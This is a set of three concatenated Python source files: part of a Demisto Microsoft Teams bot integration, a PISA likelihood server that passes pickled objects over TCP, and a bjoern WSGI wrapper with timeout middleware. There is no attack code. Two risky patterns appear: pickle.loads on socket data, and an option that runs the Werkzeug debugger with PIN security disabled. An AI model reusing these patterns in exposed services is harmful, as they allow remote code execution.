            formatted_message: str = urlify_hyperlinks(message)
            mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
            entities = mentioned_users_to_entities(mentioned_users, integration_context)
            demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
            conversation = {
                'type': 'message',
                'text': formatted_message_with_mentions,
                'entities': entities
            }
    else:  # Adaptive card
        conversation = {
            'type': 'message',
            'attachments': [adaptive_card]
        }
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    send_message_request(service_url, recipient, conversation)
    demisto.results('Message was sent successfully.')
def mirror_investigation():
    """
    Updates the integration context with a new or existing mirror.

    If the current investigation is already mirrored, its mirror
    configuration is updated in place; otherwise a new channel is created
    in the target team and registered as a mirror.
    :raises ValueError: when invoked from the playground investigation.
    """
    investigation: dict = demisto.investigation()
    if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
        raise ValueError('Can not perform this action in playground.')
    integration_context: dict = demisto.getIntegrationContext()
    mirror_type: str = demisto.args().get('mirror_type', 'all')
    auto_close: str = demisto.args().get('autoclose', 'true')
    mirror_direction: str = demisto.args().get('direction', 'both').lower()
    team_name: str = demisto.args().get('team', '')
    if not team_name:
        team_name = demisto.params().get('team', '')
    team_aad_id: str = get_team_aad_id(team_name)
    mirrored_channels: list = list()
    teams: list = json.loads(integration_context.get('teams', '[]'))
    team: dict = dict()
    # Locate the cached team matching the requested team AAD ID
    for team in teams:
        if team.get('team_aad_id', '') == team_aad_id:
            if team.get('mirrored_channels'):
                mirrored_channels = team['mirrored_channels']
            break
    # NOTE(review): if no cached team matches, `team` is left bound to the
    # last iterated team (or {} when the cache is empty), so the final
    # `team['mirrored_channels'] = ...` below may attach the mirror to the
    # wrong team or to a throwaway dict - confirm this is intended.
    if mirror_direction != 'both':
        # Non-default direction is encoded into the mirror type string
        mirror_type = f'{mirror_type}:{mirror_direction}'
    investigation_id: str = investigation.get('id', '')
    investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
    if investigation_mirrored_index > -1:
        # Updating channel mirror configuration
        mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
        mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
        mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
        # Setting mirrored=False makes channel_mirror_loop re-apply the config
        mirrored_channels[investigation_mirrored_index]['mirrored'] = False
        demisto.results('Investigation mirror was updated successfully.')
    else:
        # New mirror: create a dedicated channel and announce its purpose
        channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
        channel_description: str = f'Channel to mirror incident {investigation_id}'
        channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
        service_url: str = integration_context.get('service_url', '')
        server_links: dict = demisto.demistoUrls()
        server_link: str = server_links.get('server', '')
        warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
        conversation: dict = {
            'type': 'message',
            'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
                    f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
                    f'you need to mention the Demisto Bot in the message.'
        }
        send_message_request(service_url, channel_id, conversation)
        mirrored_channels.append({
            'channel_id': channel_id,
            'investigation_id': investigation_id,
            'mirror_type': mirror_type,
            'mirror_direction': mirror_direction,
            'auto_close': auto_close,
            'mirrored': False,
            'channel_name': channel_name
        })
        demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
    # Persist the updated mirror list back to the integration cache
    team['mirrored_channels'] = mirrored_channels
    integration_context['teams'] = json.dumps(teams)
    demisto.setIntegrationContext(integration_context)
def channel_mirror_loop():
    """
    Runs in a long running container - checking for newly mirrored investigations.

    Polls the integration cache every 5 seconds; mirrors at most one channel
    per iteration (breaks out of both loops after the first un-mirrored
    channel is processed, so remaining ones are picked up on later passes).
    """
    while True:
        found_channel_to_mirror: bool = False
        integration_context = demisto.getIntegrationContext()
        try:
            teams: list = json.loads(integration_context.get('teams', '[]'))
            for team in teams:
                mirrored_channels = team.get('mirrored_channels', [])
                channel: dict
                for channel in mirrored_channels:
                    investigation_id = channel.get('investigation_id', '')
                    if not channel['mirrored']:
                        demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
                        channel_to_update: dict = channel
                        if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
                            demisto.mirrorInvestigation(
                                channel_to_update['investigation_id'],
                                channel_to_update['mirror_type'],
                                bool(strtobool(channel_to_update['auto_close']))
                            )
                            # Mark done so this channel is skipped on the next pass
                            channel_to_update['mirrored'] = True
                            demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
                        else:
                            demisto.info(f'Could not mirror {investigation_id}')
                        # Persist the updated mirror state immediately
                        team['mirrored_channels'] = mirrored_channels
                        integration_context['teams'] = json.dumps(teams)
                        demisto.setIntegrationContext(integration_context)
                        found_channel_to_mirror = True
                        break
                if found_channel_to_mirror:
                    break
        except json.decoder.JSONDecodeError as json_decode_error:
            # Corrupt cache - report but keep the loop alive
            demisto.error(
                f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
                f'{str(json_decode_error)}'
            )
            demisto.debug(f'Cache object: {integration_context}')
            demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
        except Exception as e:
            # Catch-all keeps the long-running loop from dying on any error
            demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
            demisto.updateModuleHealth(f'An error occurred: {str(e)}')
        finally:
            time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
    """
    Handles member added activity
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param channel_data: Microsoft Teams tenant, team and channel details
    :return: None
    :raises ValueError: if the bot service URL is not cached yet
    """
    bot_id = demisto.params().get('bot_id')
    team: dict = channel_data.get('team', {})
    team_id: str = team.get('id', '')
    team_aad_id: str = team.get('aadGroupId', '')
    team_name: str = team.get('name', '')
    tenant: dict = channel_data.get('tenant', {})
    tenant_id: str = tenant.get('id', '')
    recipient: dict = request_body.get('recipient', {})
    recipient_name: str = recipient.get('name', '')
    members_added: list = request_body.get('membersAdded', [])
    teams: list = json.loads(integration_context.get('teams', '[]'))
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    for member in members_added:
        member_id = member.get('id', '')
        # NOTE(review): substring containment check - presumably member IDs
        # embed the bot ID with a prefix (e.g. '28:<bot_id>'); confirm.
        if bot_id in member_id:
            # The bot was added to a team, caching team ID and team members
            demisto.info(f'The bot was added to team {team_name}')
            integration_context['tenant_id'] = tenant_id
            integration_context['bot_name'] = recipient_name
            break
    # Refresh the cached member list for this team regardless of who joined
    team_members: list = get_team_members(service_url, team_id)
    found_team: bool = False
    # NOTE: the loop variable below reuses (and clobbers) the name `team`
    # that earlier held the channelData team dict.
    for team in teams:
        if team.get('team_aad_id', '') == team_aad_id:
            team['team_members'] = team_members
            found_team = True
            break
    if not found_team:
        # Didn't found an existing team, adding new team object
        teams.append({
            'team_aad_id': team_aad_id,
            'team_id': team_id,
            'team_name': team_name,
            'team_members': team_members
        })
    integration_context['teams'] = json.dumps(teams)
    demisto.setIntegrationContext(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
    """
    Handles a direct message sent to the bot
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param conversation: Conversation object sent
    :param message: The direct message sent
    :return: None
    :raises ValueError: if the bot service URL is not cached yet
    """
    conversation_id: str = conversation.get('id', '')
    from_property: dict = request_body.get('from', {})
    user_id: str = from_property.get('id', '')
    team_member: dict = get_team_member(integration_context, user_id)
    username: str = team_member.get('username', '')
    user_email: str = team_member.get('user_email', '')
    formatted_message: str = str()
    attachment: dict = dict()
    return_card: bool = False
    allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
    lowered_message = message.lower()
    # Incident-creation intent: the message mentions 'incident' together
    # with 'create', 'open' or 'new'
    if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
                                                   or lowered_message.find('open') != -1
                                                   or lowered_message.find('new') != -1):
        if user_email:
            demisto_user = demisto.findUser(email=user_email)
        else:
            demisto_user = demisto.findUser(username=username)
        if not demisto_user and not allow_external_incidents_creation:
            data = 'You are not allowed to create incidents.'
        else:
            data = process_incident_create_message(demisto_user, message)
        formatted_message = urlify_hyperlinks(data)
    else:
        # Any other direct message is delegated to the server-side handler
        try:
            data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
            return_card = True
            if data.startswith('`'):  # We got a list of incidents/tasks:
                data_by_line: list = data.replace('```', '').strip().split('\n')
                return_card = True
                if data_by_line[0].startswith('Task'):
                    attachment = process_tasks_list(data_by_line)
                else:
                    attachment = process_incidents_list(data_by_line)
            else:  # Mirror investigation command / unknown direct message
                attachment = process_mirror_or_unknown_message(data)
        except Exception as e:
            # Reply with the error text instead of failing the whole request
            data = str(e)
    if return_card:
        conversation = {
            'type': 'message',
            'attachments': [attachment]
        }
    else:
        # Plain-text reply; fall back to the raw data if nothing was formatted
        formatted_message = formatted_message or data
        conversation = {
            'type': 'message',
            'text': formatted_message
        }
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
    """
    Handles activity the bot received as part of TeamsAsk flow, which includes entitlement.
    Forwards the user's response to the server, then edits the original card
    message to confirm submission.
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param value: Object which includes the entitlement and user response
    :param conversation_id: Message conversation ID
    :return: None
    :raises ValueError: if the bot service URL is not cached yet
    """
    from_property: dict = request_body.get('from', {})
    responding_member: dict = get_team_member(integration_context, from_property.get('id', ''))
    demisto.handleEntitlementForUser(
        incidentID=value.get('investigation_id', ''),
        guid=value.get('entitlement', ''),
        taskID=value.get('task_id', ''),
        email=responding_member.get('user_email', ''),
        content=value.get('response', '')
    )
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    activity_id: str = request_body.get('replyToId', '')
    update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
    """
    Handles a message in which the bot was mentioned
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param channel_data: Microsoft Teams tenant, team and channel details
    :param message: The message which was sent mentioning the bot
    :return: None
    """
    channel: dict = channel_data.get('channel', {})
    channel_id: str = channel.get('id', '')
    team_id: str = channel_data.get('team', {}).get('id', '')
    from_property: dict = request_body.get('from', {})
    team_member_id: str = from_property.get('id', '')
    if integration_context.get('teams'):
        teams: list = json.loads(integration_context['teams'])
        for team in teams:
            if team.get('team_id', '') == team_id:
                mirrored_channels: list = team.get('mirrored_channels', [])
                for mirrored_channel in mirrored_channels:
                    if mirrored_channel.get('channel_id') == channel_id:
                        # Only mirror Teams->Demisto if the mirror direction
                        # and type allow incoming messages
                        if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
                                and 'none' not in mirrored_channel.get('mirror_type', ''):
                            investigation_id: str = mirrored_channel.get('investigation_id', '')
                            username: str = from_property.get('name', '')
                            user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
                            # Post the Teams message as a war-room entry,
                            # footer-tagged so it isn't re-mirrored back
                            demisto.addEntry(
                                id=investigation_id,
                                entry=message,
                                username=username,
                                email=user_email,
                                footer=f'\n**{ENTRY_FOOTER}**'
                            )
                        # Channel matched - stop searching either way
                        return
@APP.route('/', methods=['POST'])
def messages() -> Response:
    """
    Main handler for messages sent to the bot.

    Validates the Bot Framework authorization header, caches the service
    URL, then dispatches the activity to the appropriate handler (member
    added / entitlement / direct message / channel mention). Always returns
    HTTP 200 - failed auth is only logged, not rejected with an error code.
    """
    demisto.debug('Processing POST query...')
    headers: dict = cast(Dict[Any, Any], request.headers)
    if validate_auth_header(headers) is False:
        # Invalid auth: skip processing but still answer 200 below
        demisto.info(f'Authorization header failed: {str(headers)}')
    else:
        request_body: dict = request.json
        integration_context: dict = demisto.getIntegrationContext()
        service_url: str = request_body.get('serviceUrl', '')
        if service_url:
            # Cache the service URL (sans trailing slash) for outgoing requests
            service_url = service_url[:-1] if service_url.endswith('/') else service_url
            integration_context['service_url'] = service_url
            demisto.setIntegrationContext(integration_context)
        channel_data: dict = request_body.get('channelData', {})
        event_type: str = channel_data.get('eventType', '')
        conversation: dict = request_body.get('conversation', {})
        conversation_type: str = conversation.get('conversationType', '')
        conversation_id: str = conversation.get('id', '')
        message_text: str = request_body.get('text', '')
        # Remove bot mention
        bot_name = integration_context.get('bot_name', '')
        formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
        value: dict = request_body.get('value', {})
        # Dispatch by activity kind, most specific first
        if event_type == 'teamMemberAdded':
            demisto.info('New Microsoft Teams team member was added')
            member_added_handler(integration_context, request_body, channel_data)
        elif value:
            # In TeamsAsk process
            demisto.info('Got response from user in MicrosoftTeamsAsk process')
            entitlement_handler(integration_context, request_body, value, conversation_id)
        elif conversation_type == 'personal':
            demisto.info('Got direct message to the bot')
            direct_message_handler(integration_context, request_body, conversation, formatted_message)
        else:
            demisto.info('Got message mentioning the bot')
            message_handler(integration_context, request_body, channel_data, formatted_message)
    demisto.info('Finished processing Microsoft Teams activity successfully')
    demisto.updateModuleHealth('')
    return Response(status=200)
def ring_user_request(call_request_data):
    """Issue the Graph API request that creates (rings) a new outgoing call."""
    url = f'{GRAPH_BASE_URL}/v1.0/communications/calls'
    return http_request(method='POST', url=url, json_=call_request_data)
def ring_user():
    """Rings a user on Teams.

    Notes:
        This is a ring only! no media plays in case the generated call is answered.

    Raises:
        ValueError: If the tenant ID is missing or the user cannot be found.

    Returns:
        None.
    """
    bot_id = demisto.params().get('bot_id')
    integration_context: dict = demisto.getIntegrationContext()
    tenant_id: str = integration_context.get('tenant_id', '')
    if not tenant_id:
        raise ValueError(
            'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
        )
    # Resolve the AAD object ID of the user to call: match against display
    # name, mail or UPN.
    username_to_call = demisto.args().get('username')
    user_id = ''
    for user in get_users():
        identifiers = {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}
        if username_to_call in identifiers:
            user_id = user.get('id', '')
            break
    if not user_id:
        raise ValueError(f'User {username_to_call} was not found')
    source_identity = {
        "@odata.type": "#microsoft.graph.identitySet",
        "application": {
            "@odata.type": "#microsoft.graph.identity",
            "id": bot_id
        }
    }
    target_identity = {
        "@odata.type": "#microsoft.graph.identitySet",
        "user": {
            "@odata.type": "#microsoft.graph.identity",
            "displayName": username_to_call,
            "id": user_id
        }
    }
    call_request_data = {
        "@odata.type": "#microsoft.graph.call",
        "callbackUri": 'https://callback.url',
        "direction": "outgoing",
        "source": {
            "@odata.type": "#microsoft.graph.participantInfo",
            "identity": source_identity
        },
        "targets": [
            {
                "@odata.type": "#microsoft.graph.invitationParticipantInfo",
                "identity": target_identity
            }
        ],
        "requestedModalities": ["audio"],
        "mediaConfig": {"@odata.type": "#microsoft.graph.serviceHostedMediaConfig"},
        "tenantId": tenant_id
    }
    response = ring_user_request(call_request_data)
    return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
    """
    The infinite loop which runs the mirror loop and the bot app in two different threads
    """
    while True:
        certificate: str = demisto.params().get('certificate', '')
        private_key: str = demisto.params().get('key', '')
        certificate_path = str()
        private_key_path = str()
        server = None
        try:
            # NOTE(review): port comes from PARAMS while certificate/key come
            # from demisto.params() — presumably both read the same config;
            # confirm the inconsistency is harmless.
            port_mapping: str = PARAMS.get('longRunningPort', '')
            port: int
            if port_mapping:
                if ':' in port_mapping:
                    # 'host:container' style mapping — bind the second value
                    port = int(port_mapping.split(':')[1])
                else:
                    port = int(port_mapping)
            else:
                raise ValueError('No port mapping was provided')
            Thread(target=channel_mirror_loop, daemon=True).start()
            demisto.info('Started channel mirror loop thread')
            ssl_args = dict()
            if certificate and private_key:
                # Write the cert/key to temp files (delete=False so the
                # server can read them by path); removed in `finally`.
                certificate_file = NamedTemporaryFile(delete=False)
                certificate_path = certificate_file.name
                certificate_file.write(bytes(certificate, 'utf-8'))
                certificate_file.close()
                ssl_args['certfile'] = certificate_path
                private_key_file = NamedTemporaryFile(delete=False)
                private_key_path = private_key_file.name
                private_key_file.write(bytes(private_key, 'utf-8'))
                private_key_file.close()
                ssl_args['keyfile'] = private_key_path
                demisto.info('Starting HTTPS Server')
            else:
                demisto.info('Starting HTTP Server')
            server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
            demisto.updateModuleHealth('')
            server.serve_forever()
        except Exception as e:
            error_message = str(e)
            demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
            demisto.updateModuleHealth(f'An error occurred: {error_message}')
        finally:
            # Clean up temp credential files and stop the server before the
            # next retry iteration; back off 5s to avoid a tight crash loop.
            if certificate_path:
                os.unlink(certificate_path)
            if private_key_path:
                os.unlink(private_key_path)
            if server:
                server.stop()
            time.sleep(5)
def test_module():
    """
    Tests token retrieval for Bot Framework API
    """
    # get_bot_access_token raises on failure, so reaching the results call
    # implies the token was obtained successfully.
    get_bot_access_token()
    demisto.results('ok')
def main():
    """ COMMANDS MANAGER / SWITCH PANEL

    Maps the Demisto command name to its implementation and executes it,
    reporting any exception back via return_error.
    """
    commands: dict = {
        'test-module': test_module,
        'long-running-execution': long_running_loop,
        'send-notification': send_message,
        'mirror-investigation': mirror_investigation,
        'close-channel': close_channel,
        'microsoft-teams-integration-health': integration_health,
        'create-channel': create_channel_command,
        'add-user-to-channel': add_user_to_channel_command,
        # 'microsoft-teams-create-team': create_team,
        # 'microsoft-teams-send-file': send_file,
        'microsoft-teams-ring-user': ring_user,
        'microsoft-teams-create-channel': create_channel_command,
        'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
    }
    ''' EXECUTION '''
    try:
        handle_proxy()
        command: str = demisto.command()
        LOG(f'Command being called is {command}')
        # Membership test directly on the dict — `.keys()` was redundant.
        if command in commands:
            commands[command]()
    # Log exceptions
    except Exception as e:
        return_error(f'{str(e)} - {format_exc()}')
# Demisto executes integration code with __name__ set to 'builtins'
# (Python 3), so this — not '__main__' — is the entry-point guard.
if __name__ == 'builtins':
    main()
|
llh_server.py | #!/usr/bin/env python
"""
Server(s) for handling llh requests from a client: client passes free param
values, server sets these on its DistributionMaker, generates outputs, and
compares the resulting distributions against a reference template, returning
the llh value.
Code adapted from Dan Krause
https://gist.github.com/dankrause/9607475
see `__license__`.
"""
from __future__ import absolute_import, division, print_function
__author__ = "Dan Krause, adapted by J.L. Lanfranchi"
__license__ = """
Copyright 2017 Dan Krause
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
__all__ = [
"DFLT_HOST",
"DFLT_PORT",
"DFLT_NUM_SERVERS",
"send_obj",
"receive_obj",
"serve",
"fork_servers",
"main",
]
from argparse import ArgumentParser
from multiprocessing import cpu_count, Process
import pickle
import SocketServer
import struct
from pisa.core.distribution_maker import DistributionMaker
from pisa.core.map import MapSet
# Server defaults. The port is kept as a string because it is passed around
# as a CLI argument and converted with int() at bind time.
DFLT_HOST = "localhost"
DFLT_PORT = "9000"
DFLT_NUM_SERVERS = cpu_count()  # one forked server per CPU by default
class ConnectionClosed(Exception):
    """Raised when the peer closed the connection (an empty read)."""
def send_obj(obj, sock):
    """Send a Python object over a socket.

    The object is pickled and transmitted as a 4-byte network-order length
    header followed by the pickled payload.

    Parameters
    ----------
    sock : socket
    obj : pickle-able Python object
        Object to send
    """
    payload = pickle.dumps(obj)
    # Length prefix first, then the payload; sendall guarantees full writes.
    sock.sendall(struct.pack('!i', len(payload)))
    sock.sendall(payload)
def receive_obj(sock):
    """Receive an object from a socket.

    Wire format matches `send_obj`: a 4-byte network-order length header
    followed by a pickled payload of exactly that many bytes.

    Parameters
    ----------
    sock : socket

    Returns
    -------
    obj
        Unpickled Python object

    Raises
    ------
    ConnectionClosed
        If the peer closes the connection before a complete header and
        payload have been received.
    """
    # recv(n) may legally return fewer than n bytes, so both header and
    # payload must be accumulated until complete; a single recv() call
    # could silently truncate large payloads and break unpickling.
    header = _recv_exact(sock, 4)
    payload_size = struct.unpack('!i', header)[0]
    payload = _recv_exact(sock, payload_size)
    # Payload was pickled; unpickle to recreate original Python object
    return pickle.loads(payload)


def _recv_exact(sock, num_bytes):
    """Read exactly `num_bytes` from `sock`; raise ConnectionClosed on EOF."""
    chunks = []
    remaining = num_bytes
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            raise ConnectionClosed()
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)
def serve(config, ref, port=DFLT_PORT):
    """Instantiate PISA objects and run server for processing requests.

    Blocks forever handling one request at a time: each request carries free
    parameter values, which are applied to the DistributionMaker; the
    resulting map's llh against the reference map is sent back.

    Parameters
    ----------
    config : str or iterable thereof
        Resource path(s) to pipeline config(s)
    ref : str
        Resource path to reference map
    port : int or str, optional
    """
    # Instantiate the objects here to save having to do this repeatedly
    dist_maker = DistributionMaker(config)
    ref = MapSet.from_json(ref)
    # Define server as a closure such that it captures the above-instantiated objects
    class MyTCPHandler(SocketServer.BaseRequestHandler):
        """
        The request handler class for our server.
        It is instantiated once per connection to the server, and must override
        the handle() method to implement communication to the client.
        See SocketServer.BaseRequestHandler for documentation of args.
        """
        def handle(self):
            try:
                param_values = receive_obj(self.request)
            except ConnectionClosed:
                # Client disconnected before sending a request; nothing to do
                return
            dist_maker._set_rescaled_free_params(param_values)  # pylint: disable=protected-access
            test_map = dist_maker.get_outputs(return_sum=True)[0]
            llh = test_map.llh(
                expected_values=ref,
                binned=False,  # return sum over llh from all bins (not per-bin llh's)
            )
            send_obj(llh, self.request)
    server = SocketServer.TCPServer((DFLT_HOST, int(port)), MyTCPHandler)
    print("llh server started on {}:{}".format(DFLT_HOST, port))
    server.serve_forever()
def fork_servers(config, ref, port=DFLT_PORT, num=DFLT_NUM_SERVERS):
    """Fork multiple servers for handling LLH requests. All servers are
    configured identically; ports used are sequential starting from `port`.

    Parameters
    ----------
    config : str or iterable thereof
    ref : str
    port : str or int, optional
    num : int, optional
        Defaults to number of CPUs returned by `multiprocessing.cpu_count()`
    """
    first_port = int(port)
    processes = [
        Process(target=serve, kwargs=dict(config=config, ref=ref, port=str(server_port)))
        for server_port in range(first_port, first_port + int(num))
    ]
    # Start all processes, then block until every one has finished
    for proc in processes:
        proc.start()
    for proc in processes:
        proc.join()
def main(description=__doc__):
    """Parse command line arguments and launch one server (num == 1) or a
    set of forked servers on sequential ports (num > 1)."""
    parser = ArgumentParser(description=description)
    parser.add_argument(
        "--config",
        nargs="+",
        help="""Resource location of a pipeline config; repeat --config for
        multiple pipelines"""
    )
    parser.add_argument("--ref", help="Resource location of reference (truth) map")
    parser.add_argument("--port", default=DFLT_PORT)
    parser.add_argument(
        "--num",
        default=1,
        type=int,
        help="Number of servers to fork (>= 1); if set to 1, no forking occurs",
    )
    args = parser.parse_args()
    # Remaining kwargs (config, ref, port) are forwarded to serve/fork_servers
    kwargs = vars(args)
    num = kwargs.pop("num")
    if num == 1:
        serve(**kwargs)
    else:
        fork_servers(num=num, **kwargs)
if __name__ == "__main__":  # script entry point
    main()
|
bjoern_wrapper.py | #!/usr/bin/env python
import argparse
import sys
import bjoern
import importlib
import signal
import datetime
import time
import os
import threading
import mflog
import mfutil
LOGGER = mflog.get_logger("bjoern_wrapper")
def get_wsgi_application(path):
    """Resolve a WSGI application from a 'module.submodule:func_name' path.

    Exits the process with status 1 when the path is malformed or the named
    attribute cannot be found in the imported module.
    """
    parts = path.split(':')
    if len(parts) != 2:
        LOGGER.warning("main_arg must follow module.submodule:func_name")
        sys.exit(1)
    module_path, func_name = parts
    mod = importlib.import_module(module_path)
    try:
        return getattr(mod, func_name)
    except Exception:
        LOGGER.warning("can't find: %s func_name in module: %s" % (
            func_name, mod))
        sys.exit(1)
class TimeoutWsgiMiddlewareException(Exception):
    """Raised by the SIGALRM handler to abort a request that exceeded the
    soft timeout."""
class TimeoutWsgiMiddleware(object):
    """WSGI middleware enforcing a soft (SIGALRM -> HTTP 504) and a hard
    (watchdog thread -> SIGKILL of the whole process) timeout per request.
    """

    def __init__(self, app, timeout, hard_timeout=None):
        # app: wrapped WSGI application
        # timeout: soft timeout in seconds (0 disables the SIGALRM path)
        # hard_timeout: defaults to timeout + 1
        # NOTE(review): when timeout == 0, the default hard_timeout becomes 1,
        # so the watchdog still runs with a 1-second limit — confirm intended.
        self.app = app
        self.timeout = timeout
        if hard_timeout is None:
            self.hard_timeout = timeout + 1
        else:
            self.hard_timeout = hard_timeout
        # Timestamp of the request currently being processed (None when idle)
        self.started = None
        if self.hard_timeout > 0:
            # Daemon watchdog thread enforcing the hard timeout
            x = threading.Thread(target=self.hard_timeout_handler)
            x.daemon = True
            x.start()

    def hard_timeout_handler(self):
        # Watchdog loop: polls once per second and SIGKILLs the process tree
        # when the in-flight request exceeds hard_timeout.
        now = datetime.datetime.now
        while True:
            if self.started:
                if (now() - self.started).total_seconds() > self.hard_timeout:
                    LOGGER.warning("Request (hard) Timeout => SIGKILL")
                    # Self-Kill
                    mfutil.kill_process_and_children(os.getpid())
            time.sleep(1)

    def signal_timeout_handler(self, signum, frame):
        # SIGALRM handler: aborts the running request via an exception that
        # __call__ converts into an HTTP 504 response.
        LOGGER.warning("Request (soft) Timeout => HTTP/504")
        raise TimeoutWsgiMiddlewareException("soft timeout")

    def __call__(self, environ, start_response):
        # Generator-style WSGI callable: streams chunks from the wrapped app.
        if self.hard_timeout > 0:
            self.started = datetime.datetime.now()
        iterable = None
        if self.timeout > 0:
            signal.signal(signal.SIGALRM, self.signal_timeout_handler)
            signal.alarm(self.timeout)
        soft_timeout_exc_info = None
        try:
            # see http://blog.dscpl.com.au/2012/10/
            # obligations-for-calling-close-on.html
            iterable = self.app(environ, start_response)
            for data in iterable:
                yield data
        except TimeoutWsgiMiddlewareException:
            soft_timeout_exc_info = sys.exc_info()
        finally:
            # Reset watchdog state, cancel any pending alarm and honor the
            # WSGI obligation to close() the wrapped iterable.
            self.started = None
            if self.timeout > 0:
                signal.alarm(0)
            if hasattr(iterable, 'close'):
                iterable.close()
        if soft_timeout_exc_info:
            # Soft timeout fired: report 504, passing exc_info as permitted
            # by PEP 3333 even after output may have started.
            response_headers = [('Content-Type', 'text/plain')]
            start_response("504 Gateway Time-out", response_headers,
                           soft_timeout_exc_info)
            return
class MflogWsgiMiddleware(object):
    """WSGI middleware that propagates the upstream request id into the
    process environment and converts uncaught exceptions into logged
    HTTP 500 responses (or re-raises them when raise_exception is set)."""

    def __init__(self, app, raise_exception=False, debug=False):
        # app: wrapped WSGI application
        # raise_exception: re-raise uncaught exceptions after logging (so an
        #     outer debugger middleware can render them)
        # debug: switch mflog to DEBUG level
        self.app = app
        self.raise_exception = raise_exception
        self.debug = debug
        if self.debug:
            mflog.set_config("DEBUG")

    def __call__(self, environ, start_response):
        # Expose the request id so downstream logging can correlate messages
        if "HTTP_X_REQUEST_ID" in environ:
            request_id = environ["HTTP_X_REQUEST_ID"]
            os.environ["MFSERV_CURRENT_REQUEST_ID"] = request_id
        iterable = None
        try:
            # see http://blog.dscpl.com.au/2012/10/
            # obligations-for-calling-close-on.html
            iterable = self.app(environ, start_response)
            for data in iterable:
                yield data
            if hasattr(iterable, 'close'):
                iterable.close()
        except Exception:
            if hasattr(iterable, 'close'):
                iterable.close()
            LOGGER.exception("uncatched exception")
            if self.raise_exception:
                raise
            # Replace the app's output with a plain-text 500; calling
            # start_response with exc_info is permitted by PEP 3333.
            output = b"HTTP/500 Internal Server Error"
            response_headers = [('Content-Type', 'text/plain'),
                                ('Content-Length', str(len(output)))]
            start_response("500 Internal Server Error", response_headers,
                           sys.exc_info())
            yield output
def main():
    """Parse CLI arguments, build the middleware stack and run bjoern on a
    unix socket."""
    parser = argparse.ArgumentParser(description="bjoern wrapper")
    parser.add_argument("main_arg", help="wsgi application path")
    parser.add_argument("unix_socket", help="unix socket to listen path")
    parser.add_argument("--timeout", default=60, type=int,
                        help="one request execution timeout (in seconds)")
    parser.add_argument("--debug", action="store_true",
                        help="if set, debug exceptions in browser (do not use "
                        "in production!)")
    parser.add_argument("--debug-evalex", action="store_true",
                        help="if set, you can interactively debug your app in "
                        "your brower (never use it in production!)")
    args = parser.parse_args()
    wsgi_app = get_wsgi_application(args.main_arg)
    # Remove a stale socket file left over from a previous run (best effort)
    try:
        os.unlink(args.unix_socket)
    except Exception:
        pass
    try:
        # NOTE(review): args.debug is passed both as raise_exception and as
        # debug — presumably so the werkzeug debugger below can catch the
        # re-raised exception; confirm this is intentional.
        app = MflogWsgiMiddleware(
            TimeoutWsgiMiddleware(wsgi_app, args.timeout), args.debug,
            args.debug)
        if args.debug:
            try:
                from werkzeug.debug import DebuggedApplication
                app = DebuggedApplication(app, evalex=args.debug_evalex,
                                          pin_security=False)
            except ImportError:
                LOGGER.warning(
                    "can't import werkzeug, maybe you need to "
                    "install metwork-mfext-layer-python%i_devtools "
                    "package ?", int(os.environ['METWORK_PYTHON_MODE']))
        LOGGER.debug("process start")
